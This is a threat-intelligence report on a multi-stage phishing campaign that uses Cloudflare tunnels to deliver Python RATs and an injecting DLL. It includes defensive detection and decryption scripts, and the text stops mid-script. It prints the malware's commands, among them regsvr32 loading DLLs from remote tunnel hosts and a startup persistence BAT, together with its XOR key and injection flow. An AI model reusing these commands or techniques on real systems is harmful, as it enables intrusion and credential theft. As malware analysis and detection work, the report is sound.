Severity: High | Category: Phishing

OPERATION CREST SNAKE — Breakglass Intelligence Report

Investigated: April 3, 2026 | Published: April 3, 2026

TLP: WHITE
Date: 2026-04-03
Analyst: GHOST (Breakglass Intelligence)
Classification: Cybercrime, multi-stage malware delivered through a network of Cloudflare Quick Tunnels
Status: all 5 tunnels in the current delivery chain LIVE (as of 2026-04-03T16:10Z); 3 historical tunnels dead


Executive Summary

A network of 8 Cloudflare Quick Tunnels was discovered operating a multi-stage malware delivery platform built on WsgiDAV open directories. The campaign targets UK and German-speaking victims with invoice and scanner-document lures, chains through four tunnels (lure -> WSF dropper -> BAT stagers -> ZIP payloads), and ultimately deploys 5 obfuscated Python-based RAT/stealer payloads plus a native x64 DLL with Early Bird APC injection capability. The operator has been active since at least September 2025 and updates payloads daily. At the time of analysis none of the indicators had been reported anywhere: zero detections on VirusTotal, MalwareBazaar, ThreatFox, or URLhaus.

This is the same actor as Operation Nutten Tunnel (investigated 2026-04-02) based on shared infrastructure patterns, identical WsgiDAV platform, same operator build environment (Administrator on VPS), identical Edge icon LNK disguise, and overlapping tunnel usage (wet-envelope-beam-laser tunnel shared between both campaigns).

Key Findings

  • 8 Cloudflare tunnels mapped to a single operator (all observed through the Amsterdam CF-Ray PoP; note that the CF-Ray colo reflects the edge serving the analyst's request, not the origin's location)
  • ZERO prior detections on VirusTotal, MalwareBazaar, ThreatFox or URLhaus at time of analysis: a previously unreported campaign
  • Same actor as Nutten Tunnel: shared tunnel (wet-envelope-beam-laser), same LNK build pattern, same Administrator VPS origin, WsgiDAV platform, German+UK targeting
  • 4-tunnel delivery chain (3 hops): Tunnel 1 (lure WSH) -> Tunnel 2 (WSF dropper) -> Tunnel 3 (BAT stagers) -> Tunnel 4 (ZIP payloads)
  • 5 Python RAT/stealer payloads: Obfuscated with "Kramer" custom obfuscator (Python 3.12 compiled bytecode)
  • Native x64 DLL (jopfgl.dll) with exported functions: get_payload, inject_early_bird, xor_decrypt — loads magde.dat (350KB, entropy 7.999)
  • Campaign dating system: UKMar26, UKMar27, UKA01 (Apr 1), UKA02 (Apr 2) — daily attack waves targeting UK
  • Dual targeting: German victims (FSL_DE_INV invoice LNK, rechung.pdf decoy) and UK victims (UK-prefixed payloads)
  • OPSEC failure: SID S-1-5-21-3343087317-1842942590-547433828-500 (Administrator) embedded in LNK
  • Persistence: Windows Startup folder BAT files, hidden directories, Python runtime cached in Contacts folder
  • Actor evolution: Shifted from DLL sideloading (Mar 26) to Python-based payload delivery (Mar 27+) with increasing sophistication

Infrastructure Map — 8 Cloudflare Tunnels

#  | Tunnel Subdomain                   | WsgiDAV | Role                                   | Status | First Seen
1  | crest-ind-snake-dublin             | 4.3.0   | Lure delivery (WSH)                    | LIVE   | 2026-04-02
2  | klein-changes-slim-starter         | 4.3.0   | WSF dropper hosting                    | LIVE   | 2026-01-14
3  | chubby-resident-airlines-converter | 4.3.0   | BAT stager hosting                     | LIVE   | 2026-04-01
4  | highland-trend-src-distinct        | 4.3.0   | ZIP payload hosting                    | LIVE   | 2025-11-28
5  | wet-envelope-beam-laser            | 4.3.3   | DLL+LNK+PDF hosting (shared w/ Nutten) | LIVE   | 2026-03-25
6  | triangle-county-dangerous-soon     | Unknown | Historical BAT host (Jan 2026)         | DEAD   | 2026-01-14
7  | peace-ray-unnecessary-dave         | Unknown | Historical DLL host (Mar 26)           | DEAD   | 2026-03-26
8  | rover-earlier-baseline-karen       | Unknown | Historical BAT host (Mar 27)           | DEAD   | 2026-03-27
-- | requires-fortune-nutten-eligible   | 4.3.3   | Previous investigation (Nutten Tunnel) | LIVE   | 2026-03-23

Attack Chain (Current — UKA02, April 2 2026)

[1] Victim receives: Scan_0824973350935.pdf.wsh
    (Named as a scanned PDF; actually a Windows Script Host settings file that points WSH at a remote script)
    Hosted on: crest-ind-snake-dublin.trycloudflare.com/jup/
         |
         v
[2] WSH points to: klein-changes-slim-starter.trycloudflare.com/uj/UKApr02.wsf
    (Windows Script File, JScript engine)
         |
         v
[3] WSF copies from chubby-resident-airlines-converter.trycloudflare.com:
    - UKA021.txt -> %USERPROFILE%\Contacts\UKA021.bat (Stage 1: downloader)
    - UKA022.txt -> %USERPROFILE%\Contacts\UKA022.bat (Stage 2: executor)
    10-second delay between stages
         |
         v
[4] UKA021.bat (Stage 1 — Downloader):
    a. Relaunches itself hidden via VBS wrapper
    b. Downloads from highland-trend-src-distinct.trycloudflare.com:
       - 1Mar23MA.zip (16.7MB) -> Python 3.12 x64 + 5 obfuscated Python payloads
       - 1Mar23ST.zip (16.7MB) -> Second copy (stealer variant)
       - 1Mar23SU.txt -> Startup persistence BAT
    c. Extracts to %USERPROFILE%\Contacts\MainRingtones\ and \str\
    d. Installs startup persistence
         |
         v
[5] UKA022.bat (Stage 2 — Executor):
    a. Relaunches hidden
    b. Executes ALL .py files in Python312x64\ directory:
       - 1Apr02_Annnnnnnnnnnnnnnnn-obf.py (1.3MB)
       - 1Apr02_Asssssssssss-obf.py (842KB) 
       - 1Apr02_Hvvvvvvvvvvvv-obf.py (4.5MB)
       - 1Apr02_UK-Viooooooo5-obf.py (1.3MB)
       - 2LazApr02__hvvvvvvvvvvvvv.py (7.9MB)
    c. Kills the parent processes of python.exe via WMI, orphaning the payloads to break the process tree
    d. Hides directories with attrib +h
    e. Deletes all BAT files from Contacts folder (anti-forensics)
         |
         v
[6] Python payloads execute (Kramer-obfuscated, Python 3.12 compiled bytecode):
    - An* = likely AnyDesk-based RAT
    - As* = likely AsyncRAT variant
    - Hv* = likely HVNC (Hidden VNC)
    - UK-Vio* = UK-targeted variant
    - Laz+hv* = secondary HVNC or Lazarus-linked

Attack Chain (Historical — DLL Sideloading, Mar 25-26)

[1] FSL_DE_INV_24032026_238969_EML.PDF.lnk (German invoice lure)
    SID: S-1-5-21-3343087317-1842942590-547433828-500
         |
         v
[2] cmd.exe /c start /b regsvr32 /s pnljjd.dll & start rechung.pdf
    (Registers DLL silently, opens decoy German invoice PDF)
    Both hosted on wet-envelope-beam-laser.trycloudflare.com
         |
         v
[3] UKMar26.wsf loads 4 DLLs via regsvr32 from peace-ray-unnecessary-dave:
    - dmmnknAsy.dll (AsyncRAT?)
    - pdmemeAna.dll (AnyDesk?)  
    - klnaicHvvv.dll (HVNC?)
    - bgpdpduk-vio.dll (UK variant?)
    Opens rechung.pdf as decoy

Malware Analysis

DLL Payload — jopfgl.dll (from 1MaDLL.zip)

Property      | Value
SHA256        | 3ea83adc47138478ed646170b88581af441f24feeee7f8472868286aadb132fd
Type          | PE32+ DLL (x86-64), stripped
Size          | 16,896 bytes
Compiled      | 2026-03-30T10:03:18 UTC (PE timestamp)
Imphash       | 88063500446cf32cf6c9ede2df6ccec0
Sections      | 10 (.text .data .rdata .pdata .xdata .bss .edata .idata .tls .reloc)
.text entropy | 5.88 (not packed, readable code)

Exports (CRITICAL):

Ordinal | Name                | Purpose
1       | DllRegisterServer   | COM registration hook (entry point under regsvr32 /s)
2       | DllUnregisterServer | Standard COM export
3       | get_payload         | Reads the encrypted payload file (magde.dat)
4       | inject_early_bird   | Early Bird APC injection into a new suspended process
5       | xor_decrypt         | XOR decryption of the payload

Key Imports:

  • Process injection: VirtualAllocEx, WriteProcessMemory, QueueUserAPC, ResumeThread, CreateProcessW
  • File operations: CreateFileW, ReadFile, GetFileSize
  • Memory: VirtualAlloc, VirtualProtect, VirtualProtectEx

Associated encrypted payload — magde.dat:

Property   | Value
SHA256     | f30b89d5fea624867c603d97de819f64e1eb18882d5fda157c877c89f82723e7
Size       | 350,924 bytes
Entropy    | 7.999 (encrypted/compressed)
Decryption | XOR (via exported xor_decrypt function)

Python Payloads (from 1Mar23MA.zip, April 2 2026)

Filename                         | Size  | SHA256                  | Suspected Purpose
1Apr02_Annnnnnnnnnnnnnnnn-obf.py | 1.3MB | (extracted; not listed) | AnyDesk-based RAT
1Apr02_Asssssssssss-obf.py       | 842KB | (extracted; not listed) | AsyncRAT variant
1Apr02_Hvvvvvvvvvvvv-obf.py      | 4.5MB | (extracted; not listed) | HVNC (Hidden VNC)
1Apr02_UK-Viooooooo5-obf.py      | 1.3MB | (extracted; not listed) | UK-targeted payload
2LazApr02__hvvvvvvvvvvvvv.py     | 7.9MB | (extracted; not listed) | Secondary HVNC / Lazarus-linked

Obfuscation: each payload is Python 3.12 compiled bytecode (16-byte pyc header, magic cb 0d 0d 0a) saved under a .py name. The bundled python.exe executes it regardless of the extension, because CPython checks the file header for the pyc magic before treating input as source. The bytecode uses a custom "Kramer" class obfuscator with a __decode__ method and runtime exec()/eval() deobfuscation.
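A triage check for the bytecode-as-source trick described above, written as an added example (not the report's tooling): it parses the PEP 552 pyc header, maps the magic word to a CPython version, flags any file that carries that header under a .py name, and looks for the obfuscator's identifiers in the marshalled body. The magic-number table is from CPython's importlib history; the assumption that the strings "Kramer" and "__decode__" survive in the marshalled code object is mine, since the report names them but does not show the marshal layout. The sample files are constructed.

```python
"""Spot Python bytecode (.pyc) shipped under a .py name, as in the 1Apr02_*-obf.py payloads.

Added example, not code from the report. The magic-number table is CPython's;
the Kramer/__decode__ marker check assumes those identifiers survive in the
marshalled code object.
"""
import struct

# CPython pyc magic words (little-endian u16 followed by b"\r\n").
PYC_MAGIC_VERSIONS = {
    3413: "3.8", 3425: "3.9", 3439: "3.10",
    3495: "3.11", 3531: "3.12", 3571: "3.13",
}
OBFUSCATOR_MARKERS = (b"Kramer", b"__decode__")   # names the report attributes to the obfuscator


def parse_pyc_header(data):
    """Parse the 16-byte PEP 552 pyc header. Returns a dict, or None if not a known pyc."""
    if len(data) < 16 or data[2:4] != b"\r\n":
        return None
    magic, = struct.unpack_from("<H", data, 0)
    version = PYC_MAGIC_VERSIONS.get(magic)
    if version is None:           # unknown interpreter version (extend the table as needed)
        return None
    flags, = struct.unpack_from("<I", data, 4)
    info = {"magic": magic, "version": version, "hash_based": bool(flags & 1)}
    if flags & 1:                 # hash-based pyc: 8-byte SipHash of the source
        info["source_hash"] = data[8:16].hex()
    else:                         # timestamp-based pyc: source mtime and size
        info["mtime"], info["source_size"] = struct.unpack_from("<II", data, 8)
    return info


def classify(name, data):
    """Verdict for one file: is it bytecode, and is it masquerading as source?"""
    header = parse_pyc_header(data)
    verdict = {"name": name, "is_pyc": header is not None, "masquerade": False,
               "version": None, "markers": []}
    if header is None:
        return verdict
    verdict["version"] = header["version"]
    verdict["masquerade"] = name.lower().endswith(".py")
    verdict["markers"] = [m.decode() for m in OBFUSCATOR_MARKERS if m in data[16:]]
    return verdict


def fake_pyc(version_magic, body):
    """Constructed sample: a timestamp-based pyc header in front of an arbitrary body."""
    return (struct.pack("<H", version_magic) + b"\r\n" + struct.pack("<I", 0)
            + struct.pack("<II", 1743580800, len(body)) + body)


# Constructed samples: one ".py" that is really 3.12 bytecode carrying the
# obfuscator's names, and one genuine source file.
SAMPLES = {
    "1Apr02_Annnnnnnnnnnnnnnnn-obf.py": fake_pyc(3531, b"\xe3\x00\x00Kramer\x00__decode__\x00exec"),
    "setup.py": b"import os\nprint('hello')\n",
}

if __name__ == "__main__":
    for fname, blob in SAMPLES.items():
        v = classify(fname, blob)
        flag = "BYTECODE-AS-SOURCE" if v["masquerade"] else "ok"
        print(f"{fname}: {flag} python={v['version']} markers={v['markers']}")
```

Point it at an extracted Python312x64\ directory by reading each file's first 16 bytes plus body into classify(); a hit with version 3.12 and both markers matches the report's description of the Kramer-obfuscated payloads.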

Persistence Mechanism (1Mar23SU.txt)

Installs to Windows Startup folder. On reboot, executes Python scripts from 4 locations:

  1. %APPDATA%\Winic\30.3.0rc50\Python312x32\ (32-bit Python, mode 2: kills explorer+nslookup parents)
  2. %USERPROFILE%\Contacts\Str\python312x64\ (64-bit Python, mode 1)
  3. %USERPROFILE%\Contacts\Str\python312x644\ (64-bit Python, second instance)
  4. Uses VBS helper DiscordDial.vbs for parent process termination via WMI

Connection to Operation Nutten Tunnel

Evidence           | Nutten Tunnel                   | Crest Snake                            | Match
WsgiDAV server     | v4.3.3                          | v4.3.0 + v4.3.3                        | PARTIAL (shared wet-envelope tunnel is 4.3.3)
CF-Ray PoP         | Amsterdam (AMS)                 | Amsterdam (AMS)                        | YES (weak: the colo reflects the analyst's edge, not the origin)
LNK build user     | Administrator                   | Administrator (SID ...828-500)         | YES
Edge icon disguise | Yes                             | Yes                                    | YES
WebDAV over SSL    | Yes                             | Yes                                    | YES
Target language    | German (DKM bank)               | German (FSL invoice) + UK              | YES (expanded)
Shared tunnel      | wet-envelope-beam-laser         | wet-envelope-beam-laser                | DIRECT LINK
Attack pattern     | WSH->JS->BAT->Python->shellcode | WSH->WSF->BAT->Python+DLL              | EVOLVED
Python runtime     | Python 3.11.8 (downloaded)      | Python 3.12 x64 (bundled)              | UPGRADED
Encryption         | AES-256-CBC                     | XOR (DLL) + Kramer obfuscator (Python) | CHANGED
Persistence        | CryptoLoader.lnk in Startup     | Random-named BAT in Startup            | EVOLVED

Attribution confidence: HIGH (same actor, evolved TTPs). The shared wet-envelope-beam-laser tunnel is the strongest single link: a Quick Tunnel hostname is bound to one running cloudflared instance and disappears when that process exits, so both campaigns were served from the same origin host.

Actor Timeline

Date       | Activity                                              | Evidence
2025-09-01 | Earliest payload reference (inferred from filename)   | Sep01x86_Ayoo.zip on highland-trend tunnel
2025-11-28 | Sep01x86_Ayoo.zip uploaded                            | File timestamp on highland-trend
2025-12-15 | Startup BAT template created                          | 1Mar23SU.bat timestamp
2026-01-14 | 1PhJ14.wsf deployed                                   | WSF dropper via triangle-county tunnel
2026-03-23 | Nutten Tunnel campaign begins                         | LNK+WSH+JS+BAT chain (German-targeted)
2026-03-25 | German invoice LNK (FSL_DE_INV)                       | wet-envelope-beam-laser tunnel
2026-03-26 | Multi-DLL campaign                                    | UKMar26.wsf: 4 DLLs via peace-ray tunnel
2026-03-27 | Shift to BAT stagers                                  | UKMar27.wsf via rover-earlier tunnel
2026-03-30 | jopfgl.dll compiled                                   | PE timestamp + 1MaDLL.zip
2026-04-01 | UKA01 campaign (UK-targeted)                          | BAT stagers + DLL via regsvr32
2026-04-02 | UKA02 campaign (current)                              | Full Python+DLL chain, 5 payloads

Threat Actor Profile

Attribution Assessment

  • Confidence: HIGH (same actor as Nutten Tunnel)
  • Country/Region: Unknown; German+UK targeting suggests a European focus. The Amsterdam CF-Ray PoP is not evidence of origin location, since the colo code identifies the Cloudflare edge that served the analyst's request.
  • Motivation: Financial (RAT/stealer deployment, credential theft)
  • Sophistication: MODERATE-HIGH (multi-tunnel architecture, daily payload rotation, custom obfuscator, Early Bird injection)
  • OPSEC Failures:
    • SID embedded in LNK: S-1-5-21-3343087317-1842942590-547433828-500
    • Built on VPS as Administrator (same as Nutten: C:\Users\Administrator)
    • Open directory with read-write anonymous access
    • Payload naming reveals malware families (An=AnyDesk, As=Async, Hv=HVNC, Vio=?)
    • Historical payloads left accessible on tunnels
    • Descriptive filenames like "rechung.pdf" reveal targeting

Naming Convention Analysis

The actor uses a consistent payload naming scheme:

  • An/Ann = AnyDesk/AnyDesk-based RAT
  • As/Ass = AsyncRAT
  • Hv/Hvv = HVNC (Hidden Virtual Network Computing)
  • UK-Vio = UK-targeted variant (possibly ViolateStealer?)
  • Laz = Unknown (Lazarus reference? or Lazy loader?)
  • -obf suffix = obfuscated
  • Date prefix = campaign date (1Apr02, 1SApr02)
  • S prefix in second ZIP = "stealer" or "second" variant

IOC Summary

Network Indicators (Defanged)

Active Tunnels:

  • hxxps://crest-ind-snake-dublin[.]trycloudflare[.]com/ (Lure)
  • hxxps://klein-changes-slim-starter[.]trycloudflare[.]com/ (WSF dropper)
  • hxxps://chubby-resident-airlines-converter[.]trycloudflare[.]com/ (BAT stagers)
  • hxxps://highland-trend-src-distinct[.]trycloudflare[.]com/ (ZIP payloads)
  • hxxps://wet-envelope-beam-laser[.]trycloudflare[.]com/ (DLL+LNK+PDF)

Dead and prior-campaign tunnels:

  • hxxps://triangle-county-dangerous-soon[.]trycloudflare[.]com/ (dead)
  • hxxps://peace-ray-unnecessary-dave[.]trycloudflare[.]com/ (dead)
  • hxxps://rover-earlier-baseline-karen[.]trycloudflare[.]com/ (dead)
  • hxxps://requires-fortune-nutten-eligible[.]trycloudflare[.]com/ (Nutten Tunnel; still LIVE at time of writing, listed here as prior-campaign infrastructure)

File Indicators

File                                   | SHA256
Scan_0824973350935.pdf.wsh             | 99f2048b16cfd0729c85f2c1822ea06507925b2be06186e80544eac18772ed4f
UKApr02.wsf                            | 79eb3a25e8cd93bda05e3f86897de2d057a776be68a95586eedad6566c79c2c4
UKA021.txt (BAT Stage 1)               | 53dfef40de6d91c71ff6ae676a609bd1e82a70c6cf9478a89909ee7e258b516e
UKA022.txt (BAT Stage 2)               | 218628edc95f7c425fad294048adca65e235ae3024f084c9afaf483f66f71b6c
UKA011.txt (Apr 1 Stage 1)             | a05ca4e0e257ee5bd584ddd8dfdb3d5c9f6d87dbc46b7afe1c1e6a0ab6467c4e
UKA012.txt (Apr 1 Stage 2)             | 7fd6934f8fd8ef0e78ae37ab04f31aed8543a8bd2a1dac0b388ce8fe074c3086
1Mar23SU.txt (persistence)             | 6056329246bf6ef61ff8eae8bf7697ea59bfc3413cd7c9ce338e51e302264f46
1Mar23SU.bat (old persistence)         | 832326f3a377973a35cb465bd3510f5f6199c7454a0e0557e4f95b85313a76a5
jopfgl.dll                             | 3ea83adc47138478ed646170b88581af441f24feeee7f8472868286aadb132fd
magde.dat (encrypted payload)          | f30b89d5fea624867c603d97de819f64e1eb18882d5fda157c877c89f82723e7
init.cmd                               | 766ab64ffd028972b40e7c171525891b1f06a9d381b3f5072de82d77b29f7682
FSL_DE_INV_24032026_238969_EML.PDF.lnk | 5e112f4229dd70373d9d348fc649a1de971243c610f83e80b95a24910375b28e
1MaDLL.zip                             | 314c2cb202e4cea8d63051325abe326dfb75ae2995e843f6e8eea247290f59a1
1Mar23MA.zip                           | 802b7b05b9be13fee44fac9fa02a7433cedec147fe41becd3a2dfd5ad6c342b3
1Mar23ST.zip                           | 57483ef356187724ed3ca9d7f27fdcfe6f09f0cb365f667009cb01f549704c5a
UKMar26.wsf                            | bd3a7e2805d2f6f371366d6847998843b98298a748c45dd3ef6014b85697c4ae
UKMar27.wsf                            | 6b45e1a38609b9b7f2f2508b0b38f700a75ee1ea9b6c548d1a086bd91863efc3
1PhJ14.wsf                             | 13a6420822dab0d4ca6c1b422c66e5dd3a59637588279097efe47f7e553eb849
TheDll.wsf                             | f38cd6aa26981ba1eea4fb0ec8f9db212e518f65f28556e108ef74d92e4809b6
theDll.js                              | f2caaf774ab4ac5e7b5d9299117eb1bad22e025a2e530ffc29496456760390b6

DLL Imphash: 88063500446cf32cf6c9ede2df6ccec0

Behavioral Indicators

File System:

  • %USERPROFILE%\Contacts\MainRingtones\ (Python runtime + payloads)
  • %USERPROFILE%\Contacts\str\ (second payload set)
  • %USERPROFILE%\Contacts\docuts\ (staging directory, deleted after extraction)
  • %APPDATA%\TokenSys\emand.dll (DLL payload, Apr 1 campaign)
  • %APPDATA%\Winic\30.3.0rc50\Python312x32\ (32-bit Python persistence)
  • %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\*.bat (persistence)

Processes:

  • python.exe spawned from hidden BAT
  • regsvr32.exe /s (DLL loading)
  • wscript.exe (WSH/WSF execution)
  • Parent process killing via WMI (explorer.exe -> python.exe chain)

Anti-Forensics:

  • Hidden directories via attrib +h
  • BAT file self-deletion from Contacts folder
  • VBS helper scripts created and deleted
  • Parent process termination to hide execution chain

MITRE ATT&CK Mapping

Tactic               | Technique                                                             | ID        | Application
Resource Development | Acquire Infrastructure: Web Services                                  | T1583.006 | Cloudflare Quick Tunnels (trycloudflare) fronting WsgiDAV open directories
Initial Access       | Phishing: Spearphishing Link                                          | T1566.002 | WSH lure disguised as a PDF scan, hosted on tunnel 1
Execution            | Command and Scripting Interpreter: JavaScript                         | T1059.007 | WSH -> WSF (JScript engine) chain via wscript.exe
Execution            | Command and Scripting Interpreter: Visual Basic                       | T1059.005 | VBS wrapper for hidden relaunch, DiscordDial.vbs WMI helper
Execution            | Command and Scripting Interpreter: Windows Command Shell              | T1059.003 | BAT stagers
Execution            | Command and Scripting Interpreter: Python                             | T1059.006 | Obfuscated Python payloads on the bundled 3.12 runtime
Persistence          | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | T1547.001 | BAT in Startup folder, CertificateCheck.bat
Defense Evasion      | Obfuscated Files or Information                                       | T1027     | Kramer Python obfuscator, .pyc as .py, XOR-encrypted magde.dat
Defense Evasion      | Masquerading: Double File Extension                                   | T1036.007 | .pdf.wsh and .PDF.lnk lures
Defense Evasion      | Masquerading: Match Legitimate Name or Location                       | T1036.005 | DLL installed as msv1_0.dll under Microsoft\DiagSvc\
Defense Evasion      | Process Injection: Asynchronous Procedure Call                        | T1055.004 | inject_early_bird export (Early Bird APC into suspended notepad.exe)
Defense Evasion      | Indicator Removal: File Deletion                                      | T1070.004 | BAT self-deletion, VBS cleanup
Defense Evasion      | Hide Artifacts: Hidden Files and Directories                          | T1564.001 | attrib +h on payload directories
Defense Evasion      | System Binary Proxy Execution: Regsvr32                               | T1218.010 | DLL loading via regsvr32 /s
Command and Control  | Ingress Tool Transfer                                                 | T1105     | BAT stagers fetch ZIP payloads from tunnel 4
Command and Control  | Application Layer Protocol: Web Protocols                             | T1071.001 | WebDAV over HTTPS (trycloudflare)

Recommendations

Immediate (24-48 hours)

  1. Block all 9 trycloudflare tunnel subdomains at proxy/firewall; since Quick Tunnel hostnames are disposable, also alert on any *.trycloudflare.com traffic if the business has no use for it
  2. Hunt for %USERPROFILE%\Contacts\MainRingtones\ directory across endpoints
  3. Hunt for python.exe executing from Contacts\ directory path
  4. Hunt for regsvr32.exe /s with WebDAV paths in command line
  5. Hunt for attrib +h on directories within %USERPROFILE%\Contacts\
  6. Submit IOCs to threat intel feeds
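The hunts in items 2 through 5 expressed as rules over process-creation telemetry, as an added example that is not part of the report. Events are constructed here in a Sysmon-Event-ID-1-like shape with two fields, image and command_line (the field names are an assumption about the log source; map them to yours). The WebDAV UNC form (\\host@SSL\DavWWWRoot\) is also an assumption about how a tunnel-hosted DLL path appears on a command line, since the report only shows the relative form "regsvr32 /s pnljjd.dll"; the trycloudflare hostname match covers the other spellings.

```python
"""Hunt rules for the Crest Snake endpoint indicators, run over process-creation events.

Added example, not from the report. Event shape (image, command_line) and the
WebDAV UNC form (\\\\host@SSL\\DavWWWRoot\\) are assumptions; the sample events
are constructed, not real telemetry.
"""
import re

CONTACTS_PATH = re.compile(r"\\Users\\[^\\]+\\Contacts\\", re.IGNORECASE)
TUNNEL_HOST = re.compile(r"\.trycloudflare\.com", re.IGNORECASE)
REMOTE_PATH = re.compile(r"(\\\\[^\\\s]+@SSL\\|\\\\[^\\\s]+\\DavWWWRoot\\|https?://)", re.IGNORECASE)
SILENT_FLAG = re.compile(r"(^|\s)/s(\s|$)", re.IGNORECASE)
SCRIPT_LURE = re.compile(r"\.(wsh|wsf)\b", re.IGNORECASE)


def image_is(ev, *names):
    """True if the process image is one of the given executable names."""
    return ev["image"].lower().endswith(tuple("\\" + n for n in names))


def rule_python_from_contacts(ev):
    """python.exe running out of a user's Contacts folder (bundled runtime drop)."""
    return image_is(ev, "python.exe") and bool(CONTACTS_PATH.search(ev["image"]))


def rule_regsvr32_remote(ev):
    """regsvr32 /s loading a DLL from a WebDAV/HTTP path or a trycloudflare host."""
    cl = ev["command_line"]
    return (image_is(ev, "regsvr32.exe") and bool(SILENT_FLAG.search(cl))
            and bool(REMOTE_PATH.search(cl) or TUNNEL_HOST.search(cl)))


def rule_attrib_hide_contacts(ev):
    """attrib +h on a path under Contacts (payload directory hiding)."""
    cl = ev["command_line"]
    return image_is(ev, "attrib.exe") and "+h" in cl.lower() and bool(CONTACTS_PATH.search(cl))


def rule_wscript_lure(ev):
    """wscript/cscript executing a .wsh or .wsf file (lure and dropper stages)."""
    return image_is(ev, "wscript.exe", "cscript.exe") and bool(SCRIPT_LURE.search(ev["command_line"]))


RULES = {
    "python_from_contacts": rule_python_from_contacts,
    "regsvr32_remote": rule_regsvr32_remote,
    "attrib_hide_contacts": rule_attrib_hide_contacts,
    "wscript_lure": rule_wscript_lure,
}


def evaluate(events):
    """Return (event_index, rule_name) for every rule that fires on every event."""
    return [(i, name) for i, ev in enumerate(events) for name, fn in RULES.items() if fn(ev)]


SAMPLE_EVENTS = [  # constructed: four malicious stages followed by two benign look-alikes
    {"image": r"C:\Windows\System32\wscript.exe",
     "command_line": r'"C:\Windows\System32\wscript.exe" "C:\Users\alice\Downloads\Scan_0824973350935.pdf.wsh"'},
    {"image": r"C:\Users\alice\Contacts\MainRingtones\Python312x64\python.exe",
     "command_line": r'python.exe "C:\Users\alice\Contacts\MainRingtones\Python312x64\1Apr02_Asssssssssss-obf.py"'},
    {"image": r"C:\Windows\System32\regsvr32.exe",
     "command_line": r"regsvr32 /s \\wet-envelope-beam-laser.trycloudflare.com@SSL\DavWWWRoot\pnljjd.dll"},
    {"image": r"C:\Windows\System32\attrib.exe",
     "command_line": r'attrib +h "C:\Users\alice\Contacts\MainRingtones"'},
    {"image": r"C:\Program Files\Python312\python.exe",     # benign: runtime in its normal location
     "command_line": "python.exe -m pip list"},
    {"image": r"C:\Windows\System32\regsvr32.exe",          # benign: local system DLL
     "command_line": r"regsvr32 /s C:\Windows\System32\scrrun.dll"},
]

if __name__ == "__main__":
    for idx, rule in evaluate(SAMPLE_EVENTS):
        print(f"event {idx}: {rule} <- {SAMPLE_EVENTS[idx]['command_line']}")
```

The two benign events show why the rules key on location and path form rather than on the binary alone: python.exe and regsvr32 /s are everyday activity, python.exe under Contacts\ and regsvr32 pulling from a WebDAV share are not.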

Short-term (1-2 weeks)

  1. Deploy YARA rules for Kramer obfuscator and jopfgl.dll
  2. Monitor for new trycloudflare tunnels with WsgiDAV fingerprint
  3. Block .wsh and .wsf attachments at the email gateway and downloads of those types at the web proxy (the lure here arrives by link, not attachment)
  4. Implement AppLocker rules to prevent Python execution from Contacts directory

Medium-term (1-3 months)

  1. Disable WebDAV client on endpoints (WebClient service)
  2. Restrict wscript.exe and cscript.exe execution via GPO
  3. Monitor for imphash 88063500446cf32cf6c9ede2df6ccec0 in new submissions, treating it as a pivot rather than a verdict: the DLL is a small MinGW build with a common import set, so other MinGW binaries can share the hash


DLL Deep Dive — jopfgl.dll Reverse Engineering

XOR Decryption Key (Extracted from .rdata)

vGTemXQ2PUmLBCzOAPieOYoLGTonlAQ4

32-byte repeating XOR key. Applied with key[i & 0x1f] (i mod 32).

Installation Paths (from .rdata unicode strings)

  • %s\magde.dat — encrypted shellcode payload
  • %s\Microsoft\DiagSvc\ — installation directory (masquerades as Windows Diagnostic Service)
  • %s\msv1_0.dll — DLL after installation (masquerades as Windows security DLL)
  • %s\CertificateCheck.bat — persistence BAT (@echo off\r\nstart /min "" regsvr32 /s "%s")
  • notepad.exe — target process for injection

Execution Flow (from disassembly)

  1. DllRegisterServer (called by regsvr32 /s) -> calls setup -> calls inject_early_bird
  2. inject_early_bird -> calls get_payload -> reads magde.dat from same directory as DLL
  3. get_payload -> reads file -> calls xor_decrypt with 32-byte key
  4. Decrypted data = 350,924 bytes of position-independent shellcode (Donut-style loader)
  5. CreateProcessW creates suspended process (notepad.exe)
  6. VirtualAllocEx + WriteProcessMemory + QueueUserAPC + ResumeThread
  7. Shellcode executes in notepad.exe context

Shellcode Analysis (magde_decrypted.bin)

  • Size: 350,924 bytes (342.7 KB)
  • SHA256: 22752253be3a10a4598bc8fc0a80810d397a32c0cd27637db92122dc28c95878
  • Structure: CALL/POP shellcode (classic position-independent pattern)
    • Offset 0x00000: E8 C0 25 05 00 (CALL +0x525C0)
    • Offset 0x525C5: 59 (POP RCX — gets shellcode base address)
    • Data blob: 0 to 0x525C5 (337,349 bytes, entropy 7.999 — encrypted/compressed)
    • Loader code: 0x525C5 to end (13,575 bytes, entropy 6.17 — executable code)
  • Loader: Donut-style configuration structure at shellcode base
    • Resolves APIs via hash-based function at 0x5544C
    • Uses configuration offsets at [RCX+0x28], [RCX+0x88], [RCX+0xa0], [RCX+0xa8], [RCX+0x208], [RCX+0x238]
    • Creates thread/process and injects decrypted payload
  • Inner payload: Unknown — data blob requires second-stage decryption by the loader
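The decryption and the CALL/POP check from the two sections above, as an added example (not the report's or the malware's code): xor_decrypt implements the key[i & 0x1f] schedule with the quoted 32-byte key, parse_call_pop recognises the E8 rel32 ... 59 layout and splits the buffer into data blob and loader at the CALL target, and shannon_entropy reproduces the per-region entropy comparison. The sample payload is constructed (a CALL over a random blob to a POP RCX) so the script runs offline; on the real magde.dat, parse_call_pop should report the loader at 0x525C5.

```python
"""Decrypt a magde.dat-style blob and check the CALL/POP layout of the result.

Added example, not the report's or the malware's code. The key and the
key[i & 0x1f] schedule are as the report quotes them from the DLL's .rdata;
the payload built by build_sample() is constructed for offline use.
"""
import math
import random
import struct
from collections import Counter

XOR_KEY = b"vGTemXQ2PUmLBCzOAPieOYoLGTonlAQ4"  # 32 bytes, per the report


def xor_decrypt(buf, key=XOR_KEY):
    """Repeating-key XOR; with a 32-byte key, i & 0x1f equals i % 32. XOR is its own inverse."""
    if len(key) != 32:
        raise ValueError("the DLL's schedule assumes a 32-byte key")
    return bytes(b ^ key[i & 0x1f] for i, b in enumerate(buf))


def shannon_entropy(buf):
    """Bits per byte: 0.0 for a constant buffer, 8.0 for a flat distribution."""
    n = len(buf)
    if n == 0:
        return 0.0
    return -sum((c / n) * math.log2(c / n) for c in Counter(buf).values())


def parse_call_pop(sc):
    """Recognise the E8 rel32 ... 59 pattern at the start of position-independent shellcode.

    CALL pushes the address of the byte after itself (the data blob) and jumps to
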